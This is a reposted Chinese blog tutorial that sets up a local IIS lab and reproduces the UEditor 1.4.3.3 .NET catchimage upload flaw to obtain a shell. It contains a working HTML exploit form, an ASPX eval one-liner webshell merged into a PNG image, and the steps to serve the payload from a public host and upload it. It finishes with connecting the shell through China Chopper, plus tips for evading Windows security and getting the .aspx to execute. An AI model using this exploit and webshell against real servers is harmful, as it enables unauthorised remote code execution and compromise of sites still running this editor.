首页 > Web开发 > 详细

Ueditor上传漏洞复现+环境搭建

时间:2020-07-29 10:27:07      阅读:668      评论:0      收藏:0      [点我收藏+]

一、漏洞介绍

  Ueditor编辑器上传漏洞导致getshell

  漏洞存在版本:1.4.3.3 Net版(目前最新版本,已停更)

二、环境搭建

  需要安装:IIS环境搭建、Ueditor编辑器源码下载、公网图片码链接

  1.首先现在下源码文件

  技术分享图片

 

  这里可以看到有很多版本,坑:注意这个是源码文件,需要进行编译过后才可以部署到web

 

   技术分享图片

 

 

   3.编译处理

   需要环境:java、npm、grunt

   切到ueditor目录,使用 npm install  命令安装相关依赖包,安装好后目录下会多个node_modules文件夹

  技术分享图片  

 

 

   npm install -g grunt-cli  //全局安装,我也不懂,跟着操作就行

  技术分享图片

 

 

   grunt --encode=utf8 --server=net    //形成文件

  技术分享图片

 

 

   \dist\utf8-net\      //最后形成目录下为全部文件

  技术分享图片

 

 

   

  4.IIS环境搭建

    WIN10 专业版1903   ip:192.168.0.103

  开启.net服务,里面有的默认不选,反正我是全打勾了。

  技术分享图片

 

  将刚刚生成的文件夹 utf8-net 复制到test目录下,并且重命名为ueditro。

  坑:必须重命名。

  test添加为应用程序;net添加为应用程序。

 

   技术分享图片

 

 

   访问http://192.168.0.103/ueditor/index.html ,显示下面示例,部署成功。

  坑:这里部署完了后上传图片看看能不能用,能上传图片并能访问到路径,后再进行下一步操作。这里如果不能上传图片

    这里的大坑:添加用户操作权限、或.net版本过高,根据个人情况自行百度,这里的细节不太记得清了。

  技术分享图片

  为了验证漏洞是否存在,或.net环境是否能正常运行ueditor,如果下面两种情况有一种不对,就说明环境没搭建好。

  http://192.168.0.103/ueditor/net/controller.ashx?action=catchimage     //漏洞存在

  技术分享图片

  http://192.168.0.103/ueditor/net/controller.ashx?action=config    //.net环境运行正常 

  技术分享图片

 

 

 

 

三、漏洞复现

  1.POC,将标红部分修改为靶机ip,直接名命test.html 即可。

<form action="http://192.168.0.103/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
 
 <p>shell addr: <input type="text" name="source[]" /></p>
  
 <input type="submit" value="Submit" />
  
</form>

  坑:ip后的路径根据环境不同进行修改。

  2.制作图片马

  <%@ Page Language="Jscript"%><%eval(Request.Item["888888"],"unsafe");%>

  copy 121212.png/b + cese.aspx 444.png

  技术分享图片

 

   3.公网搭建临时web服务

  这里有人问了,本地再起一个web服务不行吗?我是试过了,还真不行,必须得公网的上传成功才会给返回上传路径。

  python -m SimpleHTTPServer 8080

  技术分享图片

 

 

   坑:这里的8080端口如何出网根据个人云服务进行设置

  技术分享图片

  4.上传shell

  http://**.**.**.**:8080/444.png?.aspx

  技术分享图片

 

 

   上传成功后会有地址

   技术分享图片

 

 

   根据地址访问,如果出现这种图片内容乱码,说明成功了。

  http://192.168.0.103/ueditor/net/upload/image/20200729/6373158015983417701454704.aspx

  坑:这里url路径要准确

  技术分享图片

 

 

   菜刀链接

   技术分享图片

 

 

   坑:这里最坑,1.上传上去后被win10自带安全清除文件,安全中心关的干净点 2.图片不合适合成的图片马也不能运行,多试两张图片

    3.aspx不解析,根据报错提醒让在net目录下的web.config文件添加了一行 <customErrors mode="Off"/>

    技术分享图片

 

 

 

  

 

 

参考链接:

https://www.lstazl.com/ueditor-net%E7%89%88%E6%9C%AC%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E6%80%BB%E7%BB%93/

https://jingyan.baidu.com/article/76a7e4091e6e9efc3a6e1542.html

https://developer.aliyun.com/article/713259

Ueditor上传漏洞复现+环境搭建

原文:https://www.cnblogs.com/hei-zi/p/13394764.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!